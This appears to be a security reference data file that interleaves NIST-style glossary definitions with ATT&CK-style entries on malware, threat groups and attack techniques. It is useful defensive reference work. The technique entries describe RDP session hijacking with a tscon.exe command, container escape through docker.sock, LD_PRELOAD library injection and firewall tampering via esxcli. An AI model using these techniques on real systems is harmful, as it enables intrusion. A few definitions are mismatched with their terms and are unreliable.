Description: PUNCHBUGGY is a backdoor malware used by FIN8 that has been observed targeting POS networks in the hospitality industry.

Term: FCKMS documentation
Definition: The documentation collected or produced by the FCKMS service-providing organization (including the design documentation of the CKMS that will be the foundation of the FCKMS) that states what services and functions are to be provided to FCKMS service-using organizations.

Term: BLACK data
Definition: Data that is protected by encryption so that it can be transported or stored without fear of compromise. Also known as encrypted data.

Term: ISCM Dashboard
Definition: A hierarchy of dashboards to facilitate reporting of appropriate security-related information at multiple organizational levels.

Term: <em>SEED</em>
Definition: In LMS, a secret random value used for pseudorandom key generation.

Name: Domain Accounts
Type: attack-pattern
Description: Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.

Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as OS Credential Dumping or password reuse, allowing access to privileged resources of the domain.

Term: mechanism
Definition: A device or function designed to provide one or more security services usually rated in terms of strength of service and assurance of the design.

Term: Computer Security Incident
Definition: An occurrence that actually or potentially jeopardizes, without lawful authority, the confidentiality, integrity, or availability of information or an information system; or constitutes a violation or imminent threat of violation of security policies, security procedures, or acceptable use policies.

Term: high‐dimensional
Definition: A statistic composed of many numbers—e.g. a histogram with 50,000 bins, or a vector with 1 million elements.

Term: common control provider
Definition: An organizational official responsible for the development, implementation, assessment, and monitoring of common controls (i.e., security or privacy controls inheritable by systems).

Term: Capability, Trust Management
Definition: The confidence one element has in another that the second element will behave as expected.

Term: control parameter
Definition: The variable part of a control or control enhancement that can be instantiated by an organization during the tailoring process by either assigning an organization-defined value or selecting a value from a pre-defined list provided as part of the control or control enhancement.

Term: Threat Assessment/Analysis
Definition: See threat assessment.

Name: HeartCrypt
Type: malware
Description: HeartCrypt is a packer-as-a-service (PaaS) used to protect malware that has been available since at least 2024. HeartCrypt has been used to pack a variety of malware including Lumma Stealer, Remcos, and Rhadamanthys. In the HeartCrypt PaaS model, customers submit malware via private messaging services and it is then packed and returned by the operator as a new binary.

Term: Independent Qualified Reviewer
Definition: Reviewer tasked by NIST to make a recommendation about a checklist.

Term: Interface Capabilities
Definition: Capabilities which enable interactions involving IoT devices (e.g., device-to-device communications, human-to-device communications). The types of interface capabilities are application, human user, and network.

Term: pseudorandom number generator
Definition: An RBG that includes a DRBG mechanism and (at least initially) has access to a randomness source. The DRBG produces a sequence of bits from a secret initial value called a seed, along with other possible inputs. A DRBG is often called a Pseudorandom Number (or Bit) Generator. Contrast with NRBG.

Name: Outlook Home Page
Type: attack-pattern
Description: Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.

Once malicious home pages have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded.

Term: Codec
Definition: coder/decoder, which converts analog voice into digital data and back again, and may also compress and decompress the data for more efficient transmission.

Name: Firmware Corruption
Type: attack-pattern
Description: Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot, thus denying the availability to use the devices and/or the system. Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices may include the motherboard, hard drive, or video cards.

In general, adversaries may manipulate, overwrite, or corrupt firmware in order to deny the use of the system or devices. For example, corruption of firmware responsible for loading the operating system for network devices may render the network devices inoperable. Depending on the device, this attack may also result in Data Destruction.

Term: Focal Document
Definition: A source document that is used as the basis for comparing an element with an element from another document. As of this writing, the National OLIR Program has three Focal Documents: the Cybersecurity Framework version 1.1, the Privacy Framework version 1.0, and SP 800-53 Rev. 4.

Name: Nebulae
Type: malware
Description: Nebulae Is a backdoor that has been used by Naikon since at least 2020.

Term: Machine-Readable
Definition: When used with respect to data, means data in a format that can be easily processed by a computer without human intervention while ensuring no semantic meaning is lost.

Term: key management
Definition: The activities involving the handling of cryptographic keys and other related security parameters (e.g., IVs and counters) during the entire life cycle of the keys, including their generation, storage, establishment, entry, output, use, and destruction.

Term: AODR
Definition: An organizational official acting on behalf of an authorizing official in carrying out and coordinating the required activities associated with security authorization.

Term: DC
Definition: A server responsible for managing domain information, such as login identification and passwords.

Term: Derived PIV Credential
Definition: An X.509 Derived PIV Authentication certificate, which is issued in accordance with the requirements specified in this document where the PIV Authentication certificate on the Applicant’s PIV Card serves as the original credential. The Derived PIV Credential is an additional common identity credential under HSPD-12 and FIPS 201 that is issued by a Federal department or agency and that is used with mobile devices.

Term: subscriber
Definition: An individual enrolled in the CSP identity service.

Term: Cryptographic algorithm
Definition: A well-defined computational procedure that takes variable inputs, including a cryptographic key, and produces an output.

Name: BackdoorDiplomacy
Type: intrusion-set
Description: BackdoorDiplomacy is a cyber espionage threat group that has been active since at least 2017. BackdoorDiplomacy has targeted Ministries of Foreign Affairs and telecommunication companies in Africa, Europe, the Middle East, and Asia.

Name: WannaCry
Type: malware
Description: WannaCry is ransomware that was first seen in a global attack during May 2017, which affected more than 150 countries. It contains worm-like features to spread itself across a computer network using the SMBv1 exploit EternalBlue.

Term: Intermediary Service
Definition: A component that lies between the Service Client (subscriber) and the Service Provider (publisher). It intercepts the request from the Service Client, provides the service (functionality), and forwards the request to the Service Provider. Similarly, it intercepts the response from the Service Provider and forwards it to the Service Client.

Term: Self-signed certificate
Definition: A public-key certificate whose digital signature may be verified by the public key contained within the certificate. The signature on a self-signed certificate protects the integrity of the data, but does not guarantee the authenticity of the information. The trust of self-signed certificates is based on the secure procedures used to distribute them.

Term: <em>sig</em>
Definition: A digital signature of a randomized message.

Name: Network Address Translation Traversal
Type: attack-pattern
Description: Adversaries may bridge network boundaries by modifying a network device’s Network Address Translation (NAT) configuration. Malicious modifications to NAT may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.

Network devices such as routers and firewalls that connect multiple networks together may implement NAT during the process of passing packets between networks. When performing NAT, the network device will rewrite the source and/or destination addresses of the IP address header. Some network designs require NAT for the packets to cross the border device. A typical example of this is environments where internal networks make use of non-Internet routable addresses.

When an adversary gains control of a network boundary device, they may modify NAT configurations to send traffic between two separated networks, or to obscure their activities. In network designs that require NAT to function, such modifications enable the adversary to overcome inherent routing limitations that would normally prevent them from accessing protected systems behind the border device. In network designs that do not require NAT, adversaries may use address translation to further obscure their activities, as changing the addresses of packets that traverse a network boundary device can make monitoring data transmissions more challenging for defenders. 

Adversaries may use Patch System Image to change the operating system of a network device, implementing their own custom NAT mechanisms to further obscure their activities.

Term: encryption
Definition: The process of transforming plaintext into ciphertext.

Term: Actual Residual Risk
Definition: The risk remaining after management has taken action to alter its severity.

Term: non-discretionary access control
Definition: A means of restricting access to objects based on the sensitivity (as represented by a security label) of the information contained in the objects and the formal authorization (i.e., clearance, formal access approvals, and need-to-know) of subjects to access information of such sensitivity. Mandatory Access Control is a type of nondiscretionary access control.

Term: identity verification
Definition: See “Identity Verification”.

Name: Ferocious Kitten
Type: intrusion-set
Description: Ferocious Kitten is a threat group that has primarily targeted Persian-speaking individuals in Iran since at least 2015.

Term: Interoperability Test
Definition: Interoperability tests measure the performance associated with the use of standardized biometric data records in a multiple vendor environment. It involves the production of the templates by N enrollment products and authentication of these against images processed by M others.

Term: Desired State Specification
Definition: A defined value, list, or rule (specification) that a) states or b) allows the computation of the state that the organization desires in order to reduce information security risk. Desired state specifications are generally statements of policy.

Term: mission-critical function
Definition: Any function that, if compromised, would degrade the system effectiveness in achieving the core mission for which it was designed.

Name: Indicator Removal from Tools
Type: attack-pattern
Description: Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.

A good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.

Term: enhanced security requirements
Definition: Security requirements that are to be implemented in addition to the basic and derived security requirements in SP 800-171. The security requirements provide the foundation for a defense-in-depth protection strategy that includes three mutually supportive and reinforcing components: (1) penetration-resistant architecture, (2) damage-limiting operations, and (3) designing for cyber resiliency and survivability.

Term: assessment procedure
Definition: A set of assessment objectives and an associated set of assessment methods and assessment objects.

Term: Tag
Definition: A cryptographic checksum on data that is designed to reveal both accidental errors and the intentional modification of the data.

Term: DKEYx(Y)
Definition: Decrypt Y with the key KEYx

Term: mandatory access control (MAC)
Definition: means that access control policy decisions are made by a central authority, not by the individual owner of an object. User cannot change access rights. An example of MAC occurs in military security, where an individual data owner does not decide who has a top-secret clearance, nor can the owner change the classification of an object from top-secret to secret.

Term: Major version update
Definition: A revision of a specification that breaks backward compatibility with the previous revision of the specification in numerous significant ways.

Term: pre‐training
Definition: In machine learning, a training step that trains a general‐purpose model (sometimes called a foundation model) on publicly‐available data. Pre‐training is often followed by fine‐tuning to equip the model with task‐specific information.

Name: RDP Hijacking
Type: attack-pattern
Description: Adversaries may hijack a legitimate user’s remote desktop session to move laterally within an environment. Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).

Adversaries may perform RDP session hijacking which involves stealing a legitimate user's remote session. Typically, a user is notified when someone else is trying to steal their session. With System permissions and using Terminal Services Console, `c:\windows\system32\tscon.exe [session number to be stolen]`, an adversary can hijack a session without the need for credentials or prompts to the user. This can be done remotely or locally and with active or disconnected sessions. It can also lead to Remote System Discovery and Privilege Escalation by stealing a Domain Admin or higher privileged account session. All of this can be done by using native Windows commands, but it has also been added as a feature in red teaming tools.

Term: chief information security officer
Definition: See Senior Agency Information Security Officer

Term: cryptographic module
Definition: A cryptographic module whose keys and/or metadata have been subjected to unauthorized access, modification, or disclosure while contained within the cryptographic module.

Term: Multifactor Authenticator
Definition: An authenticator that provides more than one distinct authentication factor, such as a cryptographic authentication device with an integrated biometric sensor that is required to activate the device.

Term: critical infrastructure
Definition: Systems and assets, whether physical or virtual, so vital to the United States that the incapacity or destruction of such systems and assets would have a debilitating impact on cybersecurity, national economic security, national public health or safety, or any combination of those matters.

Term: system security requirement
Definition: System requirements that have security relevance. System security requirements define the protection capabilities provided by the system, the performance and behavioral characteristics exhibited by the system, and the evidence used to determine that the system security requirements have been satisfied.
Note: Each system security requirement is expressed in a manner that makes verification possible via analysis, observation, test, inspection, measurement, or other defined and achievable means.

Term: facility
Definition: The message type for a syslog message.

Term: Claimed signatory
Definition: From the verifier’s perspective, the claimed signatory is the entity that purportedly generated a digital signature.

Term: Inverse Cipher Function (Inverse Cipher Operation)
Definition: The function that is the inverse of the forward cipher function for a given key.

Term: Security Authorization
Definition: The official management decision of the Designated Authorizing Official to permit operation of an issuer after determining that the issuer’s reliability has satisfactorily been established through appropriate assessment processes.

Term: media
Definition: Physical devices or writing surfaces including magnetic tapes, optical disks, magnetic disks, Large-Scale Integration memory chips, and printouts (but excluding display media) onto which information is recorded, stored, or printed within a system.

Term: assurance
Definition: Grounds for justified confidence that a [security or privacy] claim has been or will be achieved.

Term: Tier IV Checklist
Definition: A checklist in the National Checklist Repository that is considered production-ready and has been validated by NIST or a NIST-recognized authoritative entity to ensure, to the maximum extent possible, interoperability with SCAP-validated products. Tier IV checklists also demonstrate the ability to map low-level security settings (for example, standardized identifiers for individual security configuration issues) to high -level security requirements as represented in various security frameworks (e.g., SP 800-53 controls for FISMA), and the mappings have been vetted with the appropriate authority.

Name: J-magic
Type: malware
Description: J-magic is a custom variant of the cd00r backdoor tailored to target Juniper routers that was first observed during the J-magic Campaign in mid-2023. J-magic monitors TCP traffic for five predefined parameters or "magic packets" to be sent by the attackers before activating on compromised devices.

Term: Relatively prime
Definition: Two positive integers are relatively prime if their greatest common divisor is 1.

Term: Automated Certificate
Definition: A protocol defined in IETF RFC 8555 that provides for the automated enrollment of certificates.

Term: recovery
Definition: Recovery is executing system contingency plan activities to restore organizational missions/business functions.

Term: <em>Non-deterministic Random Bit Generator (NRBG)</em>
Definition: An RBG that always has access to an entropy source and (when working properly) produces outputs that have full entropy (see SP 800-90C). Also called a true random bit (or number) generator (Contrast with a DRBG).

Term: Digest
Definition: See hash digest

Term: synchronization
Definition: The process of setting two or more clocks to the same time.

Term: SHAKE256/192(M)
Definition: SHAKE256(M, 192), where SHAKE256 is specified in Section 6.2 of [5]. The output length is 192 bits.

Term: operational environment
Definition: Standalone, Managed, or Custom (including Specialized Security-Limited Functionality, Legacy, and United Stated Government).

Name: Power Loader
Type: malware
Description: Power Loader is modular code sold in the cybercrime market used as a downloader in malware families such as Carberp, Redyms and Gapz.

Term: Capability, Manage and Assess Risk
Definition: the on-going process of assessing the risk to IT resources andinformation, as part of a risk-based approach used to determine adequate security for a system, by analyzing the threats and vulnerabilities and selecting appropriate cost-effective controls to achieve and maintain an acceptable level of risk.

Name: PITSTOP
Type: malware
Description: PITSTOP is a backdoor that was deployed on compromised Ivanti Connect Secure VPNs during Cutting Edge to enable command execution and file read/write.

Term: subaccount
Definition: A COMSEC account that only received key from, and only reports to, its parent account, never a Central Office of Record.

Term: key-establishment key pair
Definition: A public key and its corresponding private key; a key pair is used with a public-key algorithm.

Term: adequate security
Definition: Security commensurate with the risk and the magnitude of harm resulting from the loss, misuse, or unauthorized access to or modification of information.

Term: Environmental Support
Definition: Any environmental factor for which the organization determines that it needs to continue to provide support in a contingency situation, even if in a degraded state. This could include factors such as power, air conditioning, humidity control, fire protection, lighting, etc. For example, while developing the contingency plan, the organization may determine that it is necessary to continue to ensure the appropriate temperature and humidity during a contingency situation so they would plan for the capacity to support that via supplemental/mobile air conditioning units, backup power, etc. and the associated procedures to ensure cutover operations. Such determinations are based on an assessment of risk, system categorization (impact level), and organizational risk tolerance.

Term: system interconnection
Definition: The direct connection of two or more IT systems for the purpose of sharing data and other information resources.

Term: user agreement
Definition: A user-based agreement that is similar to rules of behavior. It specifies user responsibilities when exchanging information or accessing information or systems that contain the exchanged information. Also known as access agreement or acceptable use agreement.

Name: Hancitor
Type: malware
Description: Hancitor is a downloader that has been used by Pony and other information stealing malware.

Term: Targeted security strength
Definition: The security strength that is intended to be supported by one or more implementation-related choices (such as algorithms, primitives, auxiliary functions, parameter sizes, and/or actual parameters) for the purpose of implementing a cryptographic mechanism.

Term: agility
Definition: The property of a system or an infrastructure that can be reconfigured, in which resources can be reallocated, and in which components can be reused or repurposed so that cyber defenders can define, select, and tailor cyber courses of action for a broad range of disruptions or malicious cyber activities.

Term: Central Limit Theorem
Definition: For a random sample of size n from a population with meanm and variance s2, the distribution of the sample means is approximately normal with mean m and variance s2/n as the sample size increases.

Term: Erfc
Definition: The complementary error function erfc(z) is defined in Section 5.5.3. This function is related to the normal cdf.

Term: SO
Definition: Person or organization having responsibility for the development, procurement, integration, modification, operation, and maintenance, and/or final disposition of an information system.

Term: Non-Public Personal Information
Definition: Information about a person that is not publicly known; called “private information” in some other publications.

Term: control inheritance
Definition: A situation in which a system or application receives protection from security or privacy controls (or portions of controls) that are developed, implemented, assessed, authorized, and monitored by entities other than those responsible for the system or application; entities either internal or external to the organization where the system or application resides. See common control.

Term: security authorization (to operate)
Definition: See authorization to operate (ATO).

Term: customer
Definition: The organization or person that receives a product or service.

Name: LOWBALL
Type: malware
Description: LOWBALL is malware used by admin@338. It was used in August 2015 in email messages targeting Hong Kong-based media organizations.

Name: Chaes
Type: malware
Description: Chaes is a multistage information stealer written in several programming languages that collects login credentials, credit card numbers, and other financial information. Chaes was first observed in 2020, and appears to primarily target victims in Brazil as well as other e-commerce customers in Latin America.

Term: Contract administration office
Definition: An office that performs— (1) Assigned post-award functions related to the administration of contracts; and (2) Assigned pre-award functions.

Term: adequate security
Definition: Security commensurate with the risk and magnitude of harm resulting from the loss, misuse, or unauthorized access to or modification of information.

Term: Enrollment Data Set
Definition: A record that includes information about a biometric enrollment (i.e., name and role of the acquiring agent, office and organization, time, place, and acquisition method).

Term: <em>w</em>
Definition: The length of a key-derivation key in bits.

Term: task
Definition: A Task is a specific defined piece of work that, combined with other identified Tasks, composes the work in a specific specialty area or work role.

Term: Goal
Definition: Intended outcome.

Term: Key-wrapping key
Definition: A symmetric key-encrypting key.

Name: Antivirus/Antimalware
Type: course-of-action
Description: Antivirus/Antimalware solutions utilize signatures, heuristics, and behavioral analysis to detect, block, and remediate malicious software, including viruses, trojans, ransomware, and spyware. These solutions continuously monitor endpoints and systems for known malicious patterns and suspicious behaviors that indicate compromise. Antivirus/Antimalware software should be deployed across all devices, with automated updates to ensure protection against the latest threats. This mitigation can be implemented through the following measures:

Signature-Based Detection:

- Implementation: Use predefined signatures to identify known malware based on unique patterns such as file hashes, byte sequences, or command-line arguments. This method is effective against known threats.
- Use Case: When malware like "Emotet" is detected, its signature (such as a specific file hash) matches a known database of malicious software, triggering an alert and allowing immediate quarantine of the infected file.

Heuristic-Based Detection:

- Implementation: Deploy heuristic algorithms that analyze behavior and characteristics of files and processes to identify potential malware, even if it doesn’t match a known signature.
- Use Case: If a program attempts to modify multiple critical system files or initiate suspicious network communications, heuristic analysis may flag it as potentially malicious, even if no specific malware signature is available.

Behavioral Detection (Behavior Prevention):

- Implementation: Use behavioral analysis to detect patterns of abnormal activities, such as unusual system calls, unauthorized file encryption, or attempts to escalate privileges.
- Use Case: Behavioral analysis can detect ransomware attacks early by identifying behavior like mass file encryption, even before a specific ransomware signature has been identified.

Real-Time Scanning:

- Implementation: Enable real-time scanning to automatically inspect files and network traffic for signs of malware as they are accessed, downloaded, or executed.
- Use Case: When a user downloads an email attachment, the antivirus solution scans the file in real-time, checking it against both signatures and heuristics to detect any malicious content before it can be opened.

Cloud-Assisted Threat Intelligence:

- Implementation: Use cloud-based threat intelligence to ensure the antivirus solution can access the latest malware definitions and real-time threat feeds from a global database of emerging threats.
- Use Case: Cloud-assisted antivirus solutions quickly identify newly discovered malware by cross-referencing against global threat databases, providing real-time protection against zero-day attacks.

**Tools for Implementation**:

- Endpoint Security Platforms: Use solutions such as EDR for comprehensive antivirus/antimalware protection across all systems.
- Centralized Management: Implement centralized antivirus management consoles that provide visibility into threat activity, enable policy enforcement, and automate updates.
- Behavioral Analysis Tools: Leverage solutions with advanced behavioral analysis capabilities to detect malicious activity patterns that don’t rely on known signatures.

Term: putative re-identifications
Definition: Apparent re-identifications that may or may not be correct.

Term: Security Status
Definition: The security status of an organization’s networks, information, and systems based on IA resources (e.g., people, hardware, software, policies) and capabilities in place to manage the defense of the organization and to react as the situation changes.

Term: exclusive-OR
Definition: Bit-wise exclusive-or. A mathematical operation that is defined as: 0 ⊕ 0 = 0, 0 ⊕ 1 = 1, 1 ⊕ 0 = 1, and 1 ⊕ 1 = 0

Term: reusability
Definition: The ability to use a system, system component, or data for a different purpose or to achieve a different goal than originally intended.

Name: Juicy Mix
Type: campaign
Description: Juicy Mix was a campaign conducted by OilRig throughout 2022 that targeted Israeli organizations with the Mango backdoor.

Term: scoping considerations
Definition: A part of tailoring guidance providing organizations with specific considerations on the applicability and implementation of controls in the control baselines. Considerations include policy/regulatory, technology, physical infrastructure, system element allocation, operational/environmental, public access, scalability, common control, and security objective.

Term: compromise
Definition: The disclosure of classified data to persons not authorized to receive that data.

Term: Key Translation Center (KTC)
Definition: A key center that receives keys from one entity wrapped using a symmetric key shared with that entity, unwraps the wrapped keys and rewraps the keys using a symmetric key shared with another entity.

Term: Key owner
Definition: A person authorized by an FCKMS service provider or FCKMS service-using organization to use a specific key that is managed by the FCKMS.

Term: Aperiodic Templates Test
Definition: The purpose of this test is to reject sequences that exhibit too many occurrences of a given non-periodic (aperiodic) pattern.

Term: practitioner experience
Definition: A source of ISCM assessment elements based on the experience of individuals (practitioners) with experience in designing, implementing, and operating ISCM capabilities, as well as security engineering experience.

Name: Andariel
Type: intrusion-set
Description: Andariel is a North Korean state-sponsored threat group that has been active since at least 2009. Andariel has primarily focused its operations--which have included destructive attacks--against South Korean government agencies, military organizations, and a variety of domestic companies; they have also conducted cyber financial operations against ATMs, banks, and cryptocurrency exchanges. Andariel's notable activity includes Operation Black Mine, Operation GoldenAxe, and Campaign Rifle.

Andariel is considered a sub-set of Lazarus Group, and has been attributed to North Korea's Reconnaissance General Bureau.

North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name Lazarus Group instead of tracking clusters or subgroups.

Term: Group Identifier Level 2
Definition: a GID1-like identifier.

Term: Managed Environment
Definition: Environment comprising centrally managed IT products.

Term: ISSO
Definition: Individual assigned responsibility for maintaining the appropriate operational security posture for an information system or program.
[Note: ISSO responsibility may be assigned by the senior agency information security officer, authorizing official, management official, or information system owner.]

Term: Transport Layer Security (TLS)
Definition: See Transport Layer Security (TLS).

Term: short title assignment requester (STAR)
Definition: The key management entity (KME) privileged to request assignment of a new short title and generation of key against that short title.

Term: data flow control
Definition: See with information flow control.

Term: VPN
Definition: A restricted-use, logical (i.e., artificial or simulated) computer network that is constructed from the system resources of a relatively public, physical (i.e., real) network (such as the Internet), often by using encryption (located at hosts or gateways), and often by tunneling links of the virtual network across the real network.

Term: Personal Firewall
Definition: A software application residing on a client device that increases device security by offering some protection against unwanted network connections initiated by other hosts. Personal firewalls may be client managed or centrally managed.

Term: Unpredictable
Definition: In the context of random bit generation, an output bit is unpredictable if an adversary has only a negligible advantage (that is, essentially not much better than chance) in predicting it correctly.

Term: Elliptic Curve Digital Signature Algorithm
Definition: Elliptic Curve Digital Signature Algorithm specified in [ANS X9.62] and approved in [FIPS 186].

Term: Emergency revocation
Definition: A revocation of keying material that is effected in response to an actual or suspected compromise of a key.

Term: Review Status
Definition: The status of the checklist within the internal NCP review process, a status of "Final" signifies that NCP has reviewed the checklist and has accepted it for publication within the program. Possible status options are: Candidate, Final, Archived, or Under Review.

Term: cryptographic key
Definition: A value used to control cryptographic operations, such as decryption, encryption, signature generation, or signature verification. For the purposes of these guidelines, key requirements shall meet the minimum requirements stated in Table 2 of [SP 800-57 Part1].

Term: hash function
Definition: A mathematical function that maps a string of arbitrary length to a fixed-length string.

Term: information security risk
Definition: The risk to organizational operations (including mission, functions, image, reputation), organizational assets, individuals, other organizations, and the Nation due to the potential for unauthorized access, use, disclosure, disruption, modification, or destruction of information and/or systems.

Name: Escape to Host
Type: attack-pattern
Description: Adversaries may break out of a container or virtualized environment to gain access to the underlying host. This can allow an adversary access to other containerized or virtualized resources from the host level or to the host itself. In principle, containerized / virtualized resources should provide a clear separation of application functionality and be isolated from the host environment.

There are multiple ways an adversary may escape from a container to a host environment. Examples include creating a container configured to mount the host’s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host; utilizing a privileged container to run commands or load a malicious kernel module on the underlying host; or abusing system calls such as `unshare` and `keyctl` to escalate privileges and steal secrets.

Additionally, an adversary may be able to exploit a compromised container with a mounted container management socket, such as `docker.sock`, to break out of the container via a Container Administration Command. Adversaries may also escape via Exploitation for Privilege Escalation, such as exploiting vulnerabilities in global symbolic links in order to access the root directory of a host machine.

In ESXi environments, an adversary may exploit a vulnerability in order to escape from a virtual machine into the hypervisor.

Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, accessing other containers or virtual machines running on the host, or setting up a command and control channel on the host.

Term: State Update
Definition: An on-chain transaction used to anchor the current state of an external ledger onto the underlying blockchain.

Term: Shrinkage
Definition: Product loss or theft that results in declining revenue.

Term: assessment objective
Definition: A set of determination statements that expresses the desired outcome for the assessment of a security control, privacy control, or control enhancement.

Term: senior agency information security officer (SAISO)
Definition: Official responsible for carrying out the Chief Information Officer responsibilities under the Federal Information Security Management Act (FISMA) and serving as the Chief Information Officer’s primary liaison to the agency’s authorizing officials, information system owners, and information systems security officers. 
[Note 1: With respect to SecCM, a Senior Agency Information Security Officer is an individual that provides organization-wide procedures and/or templates for SecCM, manages or participates in the Configuration Control Board, and/or provides technical staff for security impact analyses.
Note 2: Organizations subordinate to federal agencies may use the term Senior Information Security Officer or Chief Information Security Officer to denote individuals filling positions with similar responsibilities to Senior Agency Information Security Officers.]

Term: Compatible security domains
Definition: Two Security Domains are compatible if they can exchange a key and its metadata without violating (or altering) either domain’s FCKMS security policy.

Name: File Transfer Protocols
Type: attack-pattern
Description: Adversaries may communicate using application layer protocols associated with transferring files to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 

Protocols such as SMB, FTP, FTPS, and TFTP that transfer files may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the transferred files. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.

Term: chief information security officer
Definition: Official responsible for carrying out the Chief Information Officer responsibilities under FISMA and serving as the Chief Information Officer’s primary liaison to the agency’s authorizing officials, information system owners, and information system security officers. Note: Organizations subordinate to federal agencies may use the term senior information security officer or chief information security officer to denote individuals who fill positions with similar responsibilities to senior agency information security officers.

Term: access type
Definition: The nature of an access right to a particular device, program, or file (e.g., read, write, execute, append, modify, delete, or create).

Term: Web Portal
Definition: Provides a single point of entry into the SOA for requester entities, enabling them to access Web services transparently from any device at virtually any location.

Name: Virtual Private Server
Type: attack-pattern
Description: Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.

Acquiring a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers. Adversaries may also acquire infrastructure from VPS service providers that are known for renting VPSs with minimal registration information, allowing for more anonymous acquisitions of infrastructure.

Term: ciphertext
Definition: The output of the CCM encryption-generation process.

Term: media sanitization
Definition: A general term referring to the actions taken to render data written on media unrecoverable by both ordinary and extraordinary means.

Term: complex system
Definition: A system in which there are non-trivial relationships between cause and effect: each effect may be due to multiple causes; each cause may contribute to multiple effects; causes and effects may be related as feedback loops, both positive and negative; and cause-effect chains are cyclic and highly entangled rather than linear and separable.

Term: receiver operating characteristic
Definition: A curve that plots the true positive rate versus the false positive rate for a classifier.

Term: attack signature
Definition: A specific sequence of events indicative of an unauthorized access attempt.

Name: Dynamic Linker Hijacking
Type: attack-pattern
Description: Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries. During the execution preparation phase of a program, the dynamic linker loads specified absolute paths of shared libraries from various environment variables and files, such as <code>LD_PRELOAD</code> on Linux or <code>DYLD_INSERT_LIBRARIES</code> on macOS. Libraries specified in environment variables are loaded first, taking precedence over system libraries with the same function name. Each platform's linker uses an extensive list of environment variables at different points in execution. These variables are often used by developers to debug binaries without needing to recompile, deconflict mapped symbols, and implement custom functions in the original library.

Hijacking dynamic linker variables may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. On Linux, adversaries may set <code>LD_PRELOAD</code> to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. For example, adversaries have used `LD_PRELOAD` to inject a malicious library into every descendant process of the `sshd` daemon, resulting in execution under a legitimate process. When the executing sub-process calls the `execve` function, for example, the malicious library’s `execve` function is executed rather than the system function `execve` contained in the system library on disk. This allows adversaries to Hide Artifacts from detection, as hooking system functions such as `execve` and `readdir` enables malware to scrub its own artifacts from the results of commands such as `ls`, `ldd`, `iptables`, and `dmesg`.

Hijacking dynamic linker variables may grant access to the victim process's memory, system/network resources, and possibly elevated privileges.

Term: IS
Definition: The protection of information and information systems from unauthorized access, use, disclosure, disruption, modification, or destruction in order to provide confidentiality, integrity, and availability.

Term: Ideal Random Bitstring
Definition: Each bit of an ideal random sequence is unpredictable and unbiased, with a value that is independent of the values of the other bits in the sequence. Prior to the observation of the sequence, the value of each bit is equally likely to be 0 or 1, and the probability that a particular bit will have a particular value is unaffected by knowledge of the values of any or all of the other bits. An ideal random sequence of n bits contains n bits of entropy.

Term: incident response
Definition: The remediation or mitigation of violations of security policies and recommended practices.

Name: XLoader
Type: malware
Description: XLoader is an infostealer malware in use since at least 2016. Previously known and sometimes still referred to as Formbook, XLoader is a Malware as a Service (MaaS) known for stealing data from web browsers, email clients and File Transfer Protocol (FTP) applications.

Term: COMSEC custodian
Definition: An individual designated by proper authority to be responsible for the receipt, transfer, accountability, safeguarding, and destruction of COMSEC material assigned to a COMSEC account. This applies to both primary accounts and subaccounts. The equivalent key management infrastructure (KMI) position is the KMI operating account (KOA) manager.

Name: PUBLOAD
Type: malware
Description: PUBLOAD is a stager malware that has been observed installing itself in existing directories such as `C:\Users\Public` or creating new directories to stage the malware and its components. PUBLOAD malware collects details of the victim host, establishes persistence, encrypts victim details using RC4 and communicates victim details back to C2. PUBLOAD malware has previously been leveraged by China-affiliated actors identified as Mustang Panda. PUBLOAD is also known as “NoFive” and some public reporting identifies the loader component as CLAIMLOADER.

Name: Disable or Modify System Firewall
Type: attack-pattern
Description: Adversaries may disable or modify host-based or network firewalls to impair defensive mechanisms and enable further action. Once an adversary has gathered sufficient privileges, they can tamper with firewall services, policies, or rule sets to remove restrictions on inbound or outbound traffic. For example, this may include turning off firewall profiles, altering existing rules to permit previously blocked ports or protocols, or adding new rules that create covert communication paths (e.g., adding a new firewall rule for a well-known protocol (such as RDP) using a non-traditional and potentially less securitized port.

Adversaries may disable or modify firewalls using different behaviors, depending on the platform. For example, in ESXi, firewall rules may be modified directly via the esxcli (e.g., via esxcli network firewall set) or via the vCenter user interface.

